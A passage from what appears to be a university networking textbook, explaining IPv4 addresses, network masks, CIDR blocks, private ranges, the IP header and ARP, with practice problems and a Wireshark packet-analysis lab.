Internet had a mere 61 nodes). These protocols have successfully scaled to support networks of billions of users. It is estimated that two billion videos are watched on YouTube each day. Trillions of emails are sent each year. Think about all the things you use the Internet for—and then think that it all works because of protocols that were designed in 1975 for a small system, and never intended to scale to large networks. Stated another way: It is amazing that the Internet actually works at all! However, the fact that the Internet uses protocols originally designed to be used on a small network of academics means that security was never baked into the cake. Security was not needed on a network of 61 nodes, all of whom were friends. With one billion nodes on the network today, well… things are different. 3. The Premises. Kahn and Cerf reasoned that for internetworking to be efficient, everyone must agree on three things: A standard for service A global addressing scheme A uniform packet format Regarding the first item above—the standard for service—IP provides connectionless unreliable best-effort packet delivery. Connectionless: Every packet is an independent entity, possibly traveling over different paths from source to destination. Stated another way, there is no network connection that is set up in advance along which all packets will subsequently flow from source to destination. Unreliable: Packets can be lost, delivered out of order, or delivered multiple times; IP will not detect this. Best-effort: There are no guarantees packet delivery will be successful. Basically, IP says: "I'll try, but no guarantees." The standard of service provided by IP can be likened to the Post Office. To see this, suppose that you mail three letters to your family back in Los Angeles, California. Each letter is mailed from the same location in Bancroft Hall. You mail Letter #1 on Monday, Letter #2 on Tuesday and Letter #3 on Wednesday. It is quite possible that the letters follow different routes from Annapolis to Los Angeles. For instance, two of the letters might be delivered on a direct flight, while the third might be placed in a bag that has to change planes in Chicago. Letter delivery is connectionless. It is quite possible that your family receives the letters out of order, perhaps receiving Letter 3 before Letter 2. One of your letters might never be delivered—the Post Office estimates that slightly over 1% of mail is never delivered to the destination (for varying reasons). Letter delivery is unreliable. Unless you pay a premium, there are no guarantees that a letter you place in the mail will actually be delivered. Letter delivery is provided on a best-effort basis. We now address the other two requirements for internetworking. The global addressing scheme will be discussed in Section II below, and the uniform packet format will be discussed in Section III. II. The IP Address 1. A Software Address: To make a group of networks "appear" to be a single network, we must use a single global addressing scheme for all hosts on all networks. IP assigns to each computer a unique 32-bit IP address. 293 This is a "software address"; it is not a hardware address. To send a packet over a TCP/IP network, we must use the destination's IP address. IP addresses have two parts: a Network ID, which is the same for all hosts on particular network, and Host ID, which is a unique suffix for each individual host on this particular network. Network ID Host ID Same for all computers on a particular network Unique suffix for each individual computer on this particular network 2. Dotted Decimal Notation for Reading IP addresses. Let's momentarily gloss over the separation of the IP address into a Network ID and a Host ID, and simply focus on how the 32-bit address is represented. For historical reasons, IP addresses are expressed as decimal numbers (as opposed to a more sensible hexadecimal scheme). The 32-bit IP address is separated into four 8-bit chunks (octets). Each octet is then expressed as a decimal value, separated by periods. This is termed the dotted-decimal notation for IP addresses. For example, to express the IP address 10000001000010010100000111001111 in dotted decimal notation, it is first split into four octets: 10000001 00001001 01000001 11001111 and the four octets are each individually converted to a decimal (base-10) number: 10000001 00001001 129 01000001 9 65 11001111 207 We then write the four decimal numbers separated by periods: the IP address is 129.9.65.207. Practice Problem 13.1 Express each of the following IP addresses in dotted-decimal notation. (a) 00001011 00000010 00000000 00100111 (b) 10000000 10000000 11111111 00000000 Solution: (a) (b) Every computer on the Internet must have a unique IP address. That is, no two devices on the Internet can have the same IP address at the same time. In theory, since IP addresses are 32 bits, we have 2 32 (more than 4 billion) IP addresses available. Thus, in theory, more than 4 billion devices could be simultaneously connected to the Internet. 3. The Network Mask Now, let's revisit the notion that the 32 bits in an IP address are divided into a Network ID and a Host ID. To view the Network ID portion of an IP address, we use a network mask. A network mask (which we will just call a mask, since the context is understood) is a 32-bit number consisting of a string of contiguous 1’s followed by contiguous 0’s. Practice Problem 13.2 Which of the following can serve as masks? (a) (b) (c) (d) 255.2.0.0 255.255.0.0 255.255.0.23 255.255.64.0 Solution: (a) (b) (c) (d) 294 Practice Problem 13.3 Show that the address 255.240.0.0 is a mask by writing out the address as 32 bits. Solution: Since masks always have the same form (a string of ones followed by a string of zeroes), they lend themselves to an easy shorthand notation. We can write a mask as /n where n is the number of ones. This is called “slash notation” or CIDR notation. The acronym CIDR stands for Classless Inter-Domain Routing.23 Practice Problem 13.4 Write the following masks in slash notation. (a) 255.0.0.0 (b) 255.255.255.0 (c) 255.240.0.0 Solution: (a) (b) (c) Practice Problem 13.5 Write the following masks in dotted decimal notation. (a) /16 (b) /9 Solution: (a) (b) 4. Use of Masks Recall that IP addresses have two parts. Network ID Host ID We design masks so that if we bitwise AND the mask with an IP address, we extract the network ID. For example, suppose we are examining a Navy site that is using a mask of /17. Suppose we see that a host on this network has the IP address: 131.122.220.30. What is the network ID? To solve this problem, we first express the mask as a 32-bit IP address: 1 1 1 1 1 1 1 1 . 1 1 1 1 1 1 1 1 . 1 0 0 0 0 0 0 0 . 0 0 0 0 0 0 0 0 We then express the IP address as a 32-bit quantity: 1 0 0 0 0 0 1 1 . 0 1 1 1 1 0 1 0 . 1 1 0 1 1 1 0 0 . 0 0 0 1 1 1 1 0 We then bitwise AND the mask with the IP address. Recall the table for the bitwise AND operation: A 0 0 1 1 mask B 0 1 0 1 A AND B 0 0 0 1 1 1 1 1 1 1 1 1 . 1 1 1 1 1 1 1 1 . 1 0 0 0 0 0 0 0 . 0 0 0 0 0 0 0 0 IP add 1 0 0 0 0 0 1 1 . 0 1 1 1 1 0 1 0 . 1 1 0 1 1 1 0 0 . 0 0 0 1 1 1 1 0 - - - - - - - - - - - - - - - . - - - - - - - - . - - - - - - - Net add 1 0 0 0 0 0 1 1 . 0 1 1 1 1 0 1 0 . 1 0 0 0 0 0 0 0 . 0 0 0 0 0 0 0 0 23 This is pronounced "cider", like "apple cider". 295 Now, converting the result to dotted decimal notation, we have the network ID: 131.122.128.0 Recall the significance of this network address and the mask: Since the mask was given as /17, every host on this network will have the same first 17 bits in common. The network ID—131.122.128.0—specifies the exact values of these first 17 bits. Thus, every host on this network has an IP address that begins: 1 0 0 0 0 0 1 1 . 0 1 1 1 1 0 1 0 . 1 ... The remaining bits (shown as the three dots above) are used to constitute the host ID. Practice Problem 13.6 Suppose an organization has been given a mask /24. One of its machines has IP address 200.137.34.56. What is the network ID? Solution: Practice Problem 13.7 Suppose an organization has been given a mask /13. One of its machines has IP address 200.137.34.56. What is the network ID? Solution: 5. Obtaining an IP Address Each host on the Internet must have a unique IP address. It would be very bad for two (or more) people to have the same IP address. This latter (bad) event is termed an address conflict. So, we must ensure there are no address conflicts. When an organization needs IP addresses, it is given a block of addresses. So… how does an organization get a block of IP addresses to dole out to its hosts? To ensure there are no address conflicts, (i.e., to ensure uniqueness) an organization—the Internet Assigned Numbers Authority (IANA)—gives out network addresses. IANA has authorized five sub-organizations, termed Regional Address Registries, to control large blocks of addresses and distribute them to organizations in different geographic regions of the world. The Regional Address Registry covering the United States and Canada is ARIN (which stands for American Registry for Internet Numbers). Generally, ordinary organizations do not interact with ARIN. Usually, ISPs get a large number of addresses from ARIN, and organizations, in turn, get blocks of addresses from their ISP. So, the authority is: 296 ICANN IANA Ultimately controls all IP addresses address 5 Regional5Address Registries Registries that that ICANN IANA has has authorized to administer authorized to blocks of administer blocks addresses of addresses RIPE APNIC ISP 1 ARIN ISP 2 Joe’s Hardware … Sal’s Pizza LATNIC ISP 16 … … USNA AFRINIC … Figure 2. Internet authority hierarchy (RIPE = Réseaux IP Européens) So…bottom line…when an organization needs IP addresses, it is given a network address (usually from an ISP). The organization then uses the remaining bits in the IP address (corresponding to the host bits) to distribute unique IP addresses to its hosts. An Aside Believe it or not, from the inception of the Internet until late 1998, a single individual manually assigned all IP addresses. The individual, Jon Postel, was termed by many as the God of the Internet. He formed the Internet Assigned Numbers Authority (see picture above) and served as its head until his death at age 55. He was the guiding force behind a number of Internet protocols. On the ten-year anniversary of his passing, Vint Cerf offered the toast: “Here's to Jonathan B. Postel, a man who went about his work diligently and humbly, who served all who wished to partake of the Internet and to contribute to it, and who did so asking nothing in return but the satisfaction of a job well done and a world open to new ideas.” 6. IP Address Blocks When an organization is given a network ID, it is given an IP address and a mask. For example, an organization might be given the block of IP addresses: 205.16.37.32/28 In this case, the first 28 bits determine the Network ID, and the final 4 bits are used for the Host ID. Thus, all hosts on this network will have the first 28 bits in common: 205.16.37. 0 0 1 0 _ _ _ _ All hosts on this network will have the same first 28 bits—the Network ID. The organization can play with the last four bits to dole out unique IP addresses to all of its hosts. So, the organization can choose to make the host ID 0001, or 0101, or 1011, etc. It can use the last four bits to assign unique IP address to all of its hosts. The organization has 24 = 16 different ways it can assign these last four bits. 297 From Forouzan, Data Communications and Networking, 2007 Any host on this network can have its address represented in CIDR notation by following the address with the mask. For example, an individual host on the above network might have its IP address expressed as 205.16.37.39/28 More generally, a block of IP addresses is defined using the notation W.X.Y.Z/n where W.X.Y.Z defines any address in the block and /n defines the mask, i.e. the n leftmost bits are 1. 19.19 Practice Problem 13.8 You know that one of your organization’s IP addresses is 205.16.37.39 / 28. (a) Describe the mask qualitatively. Solution: (b) What is the mask in binary? Solution: (c) What is the mask in dotted decimal notation? Solution: (d) Now, the mask bits with a 1 correspond to the “network-ID” and the mask bits with a zero correspond to the bits that you can play with to assign IP addresses to your hosts. If that is the case, how many addresses have you been given? Solution: Now, we have to further complicate matters. First complication: The first address in a block is termed the network address, and is normally not assigned to a host. That is, the first address in your block, where the host bits all have a value of zero, is used to define your network to the rest of the world. In the foregoing example, we said that “we will have to revise this answer shortly.” Here is the revision: We have 16 addresses, but the first is our network address, which is not available to assign to a host. Second complication: The last address in a block is termed the broadcast address, and is normally not assigned to a host. That is, the last address in your block, where the host bits all have a value of one, is used to indicate "all hosts on this network", and this address is thus not available to assign to a host. Bottom line: When you calculate the number of IP addresses you have to play with, you first determine the number of bits in the host-ID portion, and then use the formula: Number of addresses available for assignment to hosts = 2number of bits in the host-ID portion 2 Practice Problem 13.9 298 You own a small organization that needs (and is given) 14 IP addresses for assignment to individual hosts. What is your mask in dotted decimal notation? Solution: Practice Problem 13.10 As in the example above, you know that one of your organization’s IP addresses is 205.16.37.39 / 28. What is the network address assigned to your organization? Solution: Last byte: MASK: Address: Result: This is a major point of confusion for students. If I know that one of my machines has an IP address of 205.16.37.39 how can I tell that the network address I own is 205.16.37.32 The answer: by using the mask as we have shown. Practice Problem 13.11 What is the network address of a network that has a host assigned the IP address: Solution: Practice Problem 13.12 299 182.44.82.16 / 26 What is the network address of a network that has a host assigned the IP address: Solution: 182.44.82.80 / 26 So, as you can see, there is the potential for things to get very tricky here. If you knew a host had IP address 182.44.82.80 is it obvious that the host is on a network with network address 182.44.82.64? Here is an alternate way to find the network address (i.e., the first address in your block): If the IP address of a host is W.X.Y.Z/n set the 32 n rightmost bits to zero. Practice Problem 13.13 Using the technique above, determine the network address of a network that has a host assigned the IP address: 182.44.82.16 / 26 Solution: Practice Problem 13.14 Using the technique above, determine the network address of a network that has a host assigned the IP address: 182.44.82.80 / 26. Solution: Practice Problem 13.15 Suppose one of your machines has the IP address 180.34.64.65 / 30. (a) How many addresses do you have available for assignment to hosts? (b) What is your network address? Solution: (a) (b) So much for the first address in your block. How do you find the last address (i.e., the broadcast address) in your block? 300 Here is a way to find the last address in your block: If the IP address of a host is W.X.Y.Z/n set the 32 n rightmost bits to one. Practice Problem 13.16 Suppose you know that one of your organization’s IP addresses is 205.16.37.39/28. What is the last address (the broadcast address) in the block assigned to your organization? Solution: Summary of what you need to know: Given that you have a host with address W.X.Y.Z / n determine the number of addresses you have in your block, as well as the first address (i.e., the network address) and last address (i.e., the broadcast address). IP IPAddresses Addresses(2)(2) 7. Special IP Addresses. We already mentioned that an IP address with the network ID bits are set to the proper value, but the host bits are all zero refers to the network itself. Similarly, IP address with the network ID bits set to the proper value but with the host bits all set to one is the broadcast address for that network. Here are more special IP addresses. The all-zeroes address (32 zeroes) means: “me”. This address is used by a host that does not know its IP address. The all ones address (32 ones): all hosts on this network Why would this ever be used? A host may not know its own IP address (and hence does not know its network ID). A host that just starts up and doesn't know who or where it is uses the all zeroes address to refer to itself and the all ones address to refer to "anyone else out there." The reserved address 127.0.0.0 is used for “loopback.” This address is used for testing on the local computer. When 127.0.0.0 is used as a destination address, the computer does not send the packet to the network. 8. Private IP Addresses IANA has reserved the following IP addresses for private use: 10.0.0.0 172.16.0.0 192.168.0.0 Range to to to 10.255.255.255 172.31.255.255 192.168.255.255 Special IP addresses. Special IP addresses. 5 Network You are 3/24/2007 allowed to use any of these addresses atTanenbaum will withoutChapter permission from anyone. Note that this equates to almost71 18 million addresses (almost ½ of 1% of the potential IP addresses). Private IP addresses cannot be used in the Internet, routers will not forward them. These addresses must be unique within a private network, but do not need to be unique globally. 3/24/2007 Tanenbaum Chapter 5 Network Practice Problem 13.17 (a) Can more than one organization assign the number 172.18.3.1 to one of its machines? 301 71 (b) If no, why not? If yes, does this violate the cardinal rule: No two machines on the Internet can have the same IP address at the same time? (c) What happens if I try to launch a packet with the destination address 172.18.3.1 onto the Internet? Solution: (a) (b) (c) III. The Uniform Packet Format We mentioned that IP was developed with the idea that to internetwork efficiently, we must have an agreed upon packet format. The Internet Protocol defines a hardware-independent packet format. The IP packet has the basic structure: Header Data The size of the header can vary datagram from 20 to 60 bytes. The maximum allowed total size of an IP packet (header + data) is: 64 Figure 20.5 IPv4 format KB = 65,535 bytes. The IP packet format: Forouzan, Data Communications and Networking, McGraw Hill, 2007 We offer a brief explanation for the various fields: Version: Current version IP version 4 HLEN: length of the header (in 4 byte increments): Minimum: 5, Maximum 15 (Note: In practice, the vast majority of IP packets contain no options and thus have the minimum header length of 5.) Type of service: This isn’t used much in practice. We'll ignore it. Total length: Total number of bytes in the packet (header plus data). Max is 65,535. Flags and fragmentation offset: These fields will not be covered in this class. Time to live: This eight-bit field serves as a hop-counter. The originating source of the IP packet places a number in this field (and since the field is eight bits, the maximum number that can be placed in this field is 255). The value stored in the time-to-live field is then decremented by one by each router that encounters the packet. When the time- 20.11 302 to-live (hop-counter) reaches zero, the packet is discarded. This purpose of this field is to prevent a packet from wandering around the Internet aimlessly forever. Protocol: TCP or UDP or other? Header checksum: A checksum of the header only. Addresses. If you don't know what these are, you've been asleep for the past hour! Options: These options will not be covered in this class. 303 304 Problems 1. 2. Suppose you transfer a computer from the ECE Department at USNA to the EECS Department at USMA. Will its MAC address need to be changed? Will its IP address need to be changed? (a) (b) (c) (d) (e) (f) 3. (a) (b) (c) (d) (e) (f) 4. (a) 5. What is the network address of 10.64.128.200 /28? How many IP addresses are there in the block of IP addresses assigned to this network? What is the first available IP address that can be assigned to a host? What is the last available IP address that can be assigned to a host? What is the broadcast address for this network? Can the IP addresses assigned to this network be routed across the Internet? Justify your answer. Write the following masks in slash notation. (i) 255.255.255.0 (ii) 255.240.0.0 (b) Write the following masks in dotted decimal notation. (i) /16 (ii) /9 The purpose of the header checksum field in an IP header is to (choose the correct answer): (a) (b) (c) (d) 6. Assume an IP packet traverses multiple routers on its way from source to destination. Which IP packet header fields change from router to router? You receive an IP datagram containing 1024 bytes (assume no options). What is the value of the HLEN and TOTAL LENGTH fields? What is the purpose of the Time-to-Live field in the IP packet header? If an IP packet header is 32 bytes total, what value should the HLEN field contain for this packet? A host has just been powered on and wishes to receive an IP address from the DHCP server. How can it send a request over a TCP/IP network if it does not have an IP address and does not know the address of the DHCP server? If Time To Live (TTL) field in the header of an IP packet has the value 000000001, what will happen to this packet when it travels to the next hop? Provide for error checking between source and destination Check that the headers from previous layers have been filled out correctly Add up the bytes in the message and make sure it can fit in one packet This field is no longer used for IP communications As a network administrator you notice something fishy going on in your network. In order to diagnose the problem you start sniffing packets using Wireshark and find an IP packet with the following header (shown here in hexadecimal). 45 00 00 34 60 ad 40 00 3f 06 03 5d 83 78 a8 1f 83 78 28 aa (a) (b) What version of IP is this packet using? What is the source address? 7. Consider IP address, 136.52.100.34/19. (a) What is this address’s network mask (in dotted decimal)? (b) What is this address’s network address? (c) What is this network’s broadcast address? (d) How many hosts can this network accommodate? 8. In a brief sentence, explain what is meant by the Internet Protocol principle connectionless. 9. True or False: An IP address is normally expressed in hexadecimal. 10. Write the network address for IP address 146.25.129.17/20 in dotted decimal format. 11. The purpose of the time to live field in an IP header is to (choose the correct answer): (a) Show the number of hops to the destination (b) Prevent a packet from endlessly traversing the internet (c) Translate a packet to classless routing (CIDR) (d) Amplify the network mask 305 12. Which one of the following is NOT a principle behind the design of the Internet Protocol? (a) user-defined (b) best-effort (c) unreliable 13. Fill in the blanks: An IP address is____bits long. When expressed in dotted decimal form, every ___ bits form an octet. The integer value of a single octet can range from ____ to ____ . 14. 15. In one sentence, state the purpose of a network mask. Assume you are provided the IP address 128.32.14.2 and a network mask of 255.255.254.0. (a) What is your network ID expressed in dotted decimal notation? (b) Continuing from part (a), state the number of bits that can be used to assign host IP addresses. (c) Continuing from part (b), determine how many valid host IP addresses you can assign on your network. (d) Assume that host IP addresses are assigned sequentially from lowest to highest on your network. What is the last valid IP address that can be assigned to a host on your network expressed in dotted decimal form? 16. Circle the best word, or fill in the blanks, to complete the statements below that pertain to IPv4 addresses. An IP address is a software / hardware address which is made up of 16 / 512 / 32 bits. An IP address consists of two parts, a ____________________ ID and a ____________________ ID. If all of the ____________________ ID bits of an IP address are zero, then the address is the network / broadcast address. If all of the ____________________ ID bits of an IP address are one, then the address is the network / broadcast address. 17. Show all work: (a) What is the network address of 156.143.10.55 / 21 ? (b) How many hosts can be assigned a unique IP address on this network? (c) What is the first available IP address that can be assigned to a host? (d) What is the last available IP address that can be assigned to a host? 18. Can private IPv4 addresses be routed across the Internet? If not, what is the purpose of private IP addresses? If so, explain how they can be routed across the Internet. 19. Answer True or False to each of the following statements: (a) An IP address is a software address. (b) IP addresses are used at the network layer. (c) There are 6 bytes in an IP address. (d) Once set, the IP address of a computer never changes. 20. Select from the following those that are valid IPv4 network masks? (There maybe more than one correct answer) (a) /45 (b) 255.255.128.0 (c) 128.255.255.0 (d) 255.255.240.0 (e) /16 21. You are a network administrator and given the following block of addresses from your ISP: 137.18.129.128/27 (a) How many hosts can you support on this network? (b) What is the first possible host ID? (c) What is the last possible host ID? (d) What is the broadcast address for your network? 22. Suppose you know the first address and last address in a block of IPv4 addresses (i.e., you know the network address and the broadcast address). Explain how you can determine the total number of IPv4 addresses in the block. 23. Express the following IP address in dotted-decimal notation: 01010101 . 10000101 . 00110011 . 00011111 24. Suppose you are given a block of IPv4 addresses with a prefix length of 14 – i.e., there are 14 bits in the network-ID portion of your addresses. How many addresses are in your block? 25. Express the mask /14 in dotted decimal notation. 26. Express the mask 255.240.0.0 in slash notation. 306 27. You wake up one morning, stagger over to your computer and exclaim: "Wow, one of the IP addresses in my block happens to be 140.150.16.17/18 !" Overcome with excitement, you set out to determine the first and last addresses in your block that can be assigned to hosts. What do you come up with? 28. Consider the Time-to-live field in the IP packet header. (a) Can the value stored in this field be equal to the decimal value of zero? Explain. (b) Can the value stored in this field be equal to the decimal value of twenty? Explain. (c) Can the value stored in this field be equal to the decimal value of three hundred? Explain. 29. Using Wireshark, you examine the header of an IP packet, which starts out as: 45 00 00 4E 00 10 00 00 12 06 23 c5 etc., etc. (a) How many bytes are in this IP packet's header? (b) How many bytes are there in the data portion of this IP packet? (c) How many more routers can this packet travel to before it is thrown away by a router? 30. Suppose an IP packet's header has no options. Which fields of the header can change as the packet travels from router to router? (Ignore the flag field and the fragmentation offset field.) 307 308 Security Exercise 13 Part I: Your IP Address You learned today that all computers connected to the Internet have an alternative address in addition to the physical address. This other address was referred to as IP address. We need IP addresses to communicate over the Internet. In fact: Every computer on the Internet needs a unique IP address (in addition to its unique MAC address). So, let’s begin by finding out our IP address. From the Windows command prompt, type ipconfig/all Question 1. What is your IP address for your wireless LAN? So we have an Ethernet address and an IP address. So, what again is an IP address? We mentioned that in order to make a number of dissimilar networks "appear" to be a one single happy network, we must use a single global addressing for all people on all networks. That’s where the Internet Protocol (IP) comes in. IP assigns to each computer a unique 32-bit IP address. This IP address is a "software address"; it is not a hardware address. To send a packet over the Internet, we must use the destination's IP address, not the physical address. This point bears repeating: Your IP address exists in software only. Your computer’s IP address is in no way “burned in” to the hardware, as your hardware address is. Tomorrow your computer might have a different IP address, but it will have the same physical address. To make IP addresses easy to read, they are expressed in dotted-decimal notation. Each 8 bits of the 32 bit address is expressed as a decimal value, separated by periods. Let's review by answering a few questions. Question 2. State whether the following IP addresses are valid or not; for those that are invalid, state the reason. (a) 129.11.11.239 (b) 221.34.8.9.20 (c) 193.131.28.253 Nothing good comes in life or athletics unless a lot of hard work has preceded the effort. Only temporary success is achieved by taking short cuts. (d) 78.45.300.15 309 Part II: Packet Analysis Start up VMware Workstation and power-on your Cyber2 VM. Then launch Wireshark be selecting: Applications > Internet > Wireshark (as root) Under File, Click Open and highlight the file named packets: And then hit Open. Recall that the top pane is the Packets List Pane. Starting at the left, we have the number (No) column (each packet that is captures is sequentially numbered by Wireshark) followed by the Time column (which indicates the relative time that each packet was received, with the first packet arriving at t = 0). The next two columns indicate the source and destination IP addresses for the packet. Question 3. What is the IP address of the computer that generated the 21 st packet? 310 The next column indicates which protocol is used in the packet. We have not discussed all of these in class yet, but some of them may ring a bell from SI110. The last column provides some additional information about the packet. Let’s look at packet 5182. Question 4. How many seconds into the packet capture was this packet sent? Question 5. What is the IP address of the sender of this packet? Question 6. What is the IP address of the receiver of this packet? Hmm…so we can see who is talking to whom. (Details about communication that do not reveal the contents of the communication are termed metadata.) Now, let’s look at the Packet Details pane for this packet: This shows the protocols used by this packet. So, for instance, we see that this packet used Ethernet, the Internet Protocol (IP) and the Transmission Control Protocol (TCP). By clicking on the arrow sign we can expand and collapse each of the listed protocols. The bottom pane, the Packet Byte pane, shows the data in the selected packet (in this case, packet 5182) in hexadecimal. Question 7. How many bytes of data are in this frame? Now, let’s look at the Internet Protocol in more detail. Click the arrow sign next to Internet Protocol and you should see this: 311 Question 8. What version of the Internet Protocol (IP) is being used? Question 9. IP uses a checksum for error detection. Did this packet pass the checksum? The IP packet format consists of a header, followed by data. The format of just the header is: Forouzan, Data Communications and Networking, 4th ed, 2007 Let’s find the start of the IP packet. Highlight the line that says Version 4 and the hex code should highlight in the bottom window. Starting at this location, the packet is: 45 00 01 57 36 e3 40 00 3f 06 2c 04 83 78 a8 1f 83 78 28 aa 04 d9 0c 3b a9 5b 18 98 59 96 ad 43 50 18 f5 3c 5c 6f 00 00 17 03 01 00 60 6d f0 04 92 b6 d7 66 cd 9e d5 4c b8 17 f5 25 26 06 b5 eb b8 3e c7 92 37 d3 28 36 78 8c 1e 7f 83 4f 6d 8a 24 7e 90 7d 88 ef 3d b4 ff e2 17 b7 42 67 6a 34 0b 43 43 9d 49 8e 48 2f 1b 91 fa 05 bf a5 8a 61 63 4c Question 10. What is the meaning of the first hexadecimal number (4)? The next hexadecimal number (5) indicates the length of the IP packet’s header in units of 4 bytes. Question 11. How many bytes are in the header of this IP packet? Question 12. Does your answer to Question 11 match the data provided in the Packet Details Pane? Question 13. Write down the hexadecimal numbers that correspond to the Total Length. Question 14. Write out the hexadecimal numbers in Question 13 as a binary number. Question 15. Convert the binary number in Question 14 to a decimal (base 10 number). The Total Length entry gives the size of the IP packet in bytes. Question 16. Does the number you calculated in Question 15 match the data provided in the Packet Details Pane? Is translating these hexadecimal numbers to decimal, and interpreting them, fun? Probably not, even for Computer Engineering students. This data at the bottom is called the “raw hex” or the “hex dump.” There was a time when this was what we “saw” when we used a packet sniffer. One of the nice things about Wireshark is that it provides a translation of the hex dump, and so we will usually not have to pay attention to the bottom pane. The bottom pane is what has actually been sniffed…remember, everything is bits! Note that at the right of the hex dump, we see what looks like gibberish. This represents the ASCII translation of what is in the hex dump. Since most of these hex figures are not intended to be ASCII values, the result looks like random characters. (Note that a nonprintable ASCII character translates as a period.) Every so often, though, we will be able to see usable text in this field. For example: Look at packet 136, which is a DNS request. Question 17. Looking at the bottom pane (the “raw” hex dump), what name do you suppose the user is requesting the IP address for? 312 Notice that this info is also available in the middle pane. The info in the middle pane is an attempt to provide a high-level best guess snapshot about the packet. Look at frame #4955. Question 18. What is the source IP address? Question 19. What is the meaning of this source IP address? 313 314 Security Exercise 13 Answer Sheet Name: Question 1: Question 2: (a) (b) (c) (d) Question 3: Question 4: Question 5: Question 6: Question 7: Question 8: Question 9: Question 10: 315 Question 11: Question 12: Question 13: Question 14: Question 15: Question 16: Question 17: Question 18: Question 19: 316 Chapter 14: Routing Part I Objectives: (a) State the purpose of the Address Resolution Protocol and describe its role in facilitating communication. (b) Describe the mechanism for spoofing an ARP cache with misinformation. (c) Describe how routing works at the network layer. (d) Construct an optimal routing table for a router given a network diagram and using address aggregation. (e) Describe how to make a routing decision based on the longest mask matching principle given a network diagram and a destination IP address. If you find the above cartoon outlandish, wait till you read this: http://www.thefiscaltimes.com/Articles/2013/10/08/2-Billion-NSA-Spy-Center-Going-Flames I. Address Resolution We mentioned that for internet to work effectively, we must have an agreed upon global addressing scheme. Last lecture, we discussed the addressing scheme used by the Internet Protocol, and mentioned how it is employed to make a group of different networks appear to be a single network. This global address is the IP address. Thus, from the lofty perspective of the network-layer, everyone using the network can be identified by their IP address, and everyone using the network can interpret IP packets. But… Wait a minute… Different physical networks do in fact exist. When sending data, the software at the network layer works with IP addresses but, unfortunately, the data link layer and the physical layer hardware do not speak IP; i.e., the physical and data link layers do not understand IP addresses or IP packets. To be clear: A data link frame must use the frame format and addressing scheme for the specific technology or product in use. Ethernet, for example, only understands 48-bit Ethernet addresses properly packaged within Ethernet frames. Put another way: If we were somehow to place an IP packet directly over Ethernet, the Ethernet protocol would not know what to make of it. So, IP addresses must be translated to data link layer addresses before a frame can be sent. And the IP packet itself must be placed (encapsulated) within the data field of the Ethernet frame. Translating from an IP address to a hardware address is called address resolution. 1. Address Resolution Schemes. Two address resolution techniques exist: A. Table Look-up. A network administrator could set up a table that provides the IP address to data link layer address associations: IP address Data link layer address 317 When the software has an IP address and needs to determine the corresponding data-link address, it consults the table. Unfortunately, if you ask a network administrator to maintain such a table for a large, complex and dynamic network, they will want to kill you. B. Message Exchange. Consider this scheme instead: A computer that needs to translate an IP address to a data-link address sends a message requesting this information. This request essentially says: "I want to send data to the user with IP address x; does anyone know the data-link layer address of the user with IP address x." We presume that each user knows their own Ethernet address and their own IP address. Another computer replies with the correct association. This reply essentially says: "The user with IP address x has data link address y." The respondent providing the correct association can be the target computer (the computer that owns the IP address x) or a server that stores the full network association table. This technique is used by the Internet's Address Resolution Protocol. 2. The Address Resolution Protocol (ARP) The Address Resolution Protocol (ARP) has two message types: A request message containing an IP address for which we want a data link layer address. An ARP request is broadcast to all computers on the network. A response message, which contains the IP and matching data link layer address. Only the computer that corresponds to the IP address sends a response with its data link layer address. The response is not broadcast, it is sent addressed only to the user that sent the request. The main use of ARP is to associate a logical software address with a hardware address; that is: find the hardware address of a node when its IP address is known. Since these days most hardware addresses are Ethernet, ARP finds most use in associating 32 bit IP addresses to 48 bit Ethernet addresses. 318 Let's refine the pictures above, in terms of ARP. Suppose we have a network with User A, User B and three other unnamed users. User A wants to send a packet to a user with IP address 142.33.68.23. To send the information, User A must learn the Ethernet address for the user with IP address 142.33.68.23. User A sends an ARP request to all users in the local network. Practice Problem 14.1 How can an ARP request be sent to all users in the local network? Solution: This ARP request is received by all users. Each of the users examines the IP address in the ARP request to see if that matches their IP address. Let's say that User B has IP address 142.33.68.23. User B (and only User B) would send an ARP reply containing his Ethernet address. This reply is not broadcast; it is sent in a frame addressed to User A's Ethernet address. Note that ARP allows the seamless addition of new hosts while avoiding the need for a centralized database containing IP address to Ethernet address pairings. 3. ARP Caching Most computer network communication involves a series of packet exchanges. During the first exchange, a host learns the target host’s Ethernet address. But, what does it do for the second exchange? Suppose, in the picture above, that User A has to send more data to IP address 142.33.68.23 a moment after the first exchange. It would be wasteful to have to go through the whole ARP Request/ARP Reply rigmarole all over again. To avoid excess ARP traffic, each user maintains a table of recently received IP address – Ethernet Address associations in a table called an ARP cache. In the example above, User A would make the following entry in its ARP cache: 142.33.68.23 : 23:ef:40:7d:45:77 Before sending an ARP request, a user first checks its ARP cache to see if it already has the Ethernet address that it needs (i.e., the Ethernet address for a specific IP address). ARP table entries can become incorrect without warning. For this reason, each entry in the ARP cache has a timer associated with it. When the timer expires, the entry is deleted from the cache. Typical values for this timeout are 10 minutes. Practice Problem 14.2 The Address Resolution Protocol works at which two layers? Solution: 319 Figure 21.3 Encapsulation of ARP packet 4. ARP Packet An ARP request is encapsulated in an Ethernet frame as shown below. Forouzan, Data Communications and Networking, McGraw Hill, 2007 Figure 21.2 packetby a specific entry in the Ethernet frame's Type field. The ARP packet format is This frame is identified as an ARP ARP message shown below: 21.5 Forouzan, Data Communications and Networking, McGraw Hill, 2007 Practice Problem 14.3 How21.4 many bytes are in an ARP Request packet? How many bytes are in an ARP reply packet? Solution: Several of the fields in the ARP Request and ARP Reply will always be the same. The first field is the hardware type: for Ethernet, this will always be 1. Second field is the network layer protocol type: for IP this is always 0800 16 The third field is the length of the hardware address in bytes: for Ethernet, this will be 6 The fourth field is the length of the network layer protocol address in bytes: for IP this is always 4 An ARP Request is differentiated from an ARP Reply by the entry in the Operation field: A 1 is placed in this field for ARP Request packets, and a 2 is placed in this field for ARP reply packets. Let's look at an example in gory detail. Suppose, in the picture below, User A has IP address N1 and Ethernet address L1 and that User System B has IP address N2 and Ethernet address L2. 320 Suppose User A wants to send important information to his friend, who he happens to know has IP address N2. But User A does not know the proper Ethernet address. (Recall that User A cannot just put his information in an IP packet, and just transmit the IP packet. User B's Network Interface card (NIC) expects to see an Ethernet frame. It will not know what to make of an IP packet.) User A would encapsulate an ARP request inside an Ethernet frame as shown below. L1 Note that in the picture above, the letter M is used to denote the Ethernet broadcast address FF:FF:FF:FF:FF:FF. The broadcast address is placed in the field for the destination address in the Ethernet frame. Thus all other users—User B, User X, User Y and User Z—will received this frame and pass it up to the network layer for examination. Note that User A has included his own Ethernet address and IP address (L1 and N1) in the ARP request message. Why would he do this, if his goal is simply to determine the Ethernet address for the user with IP 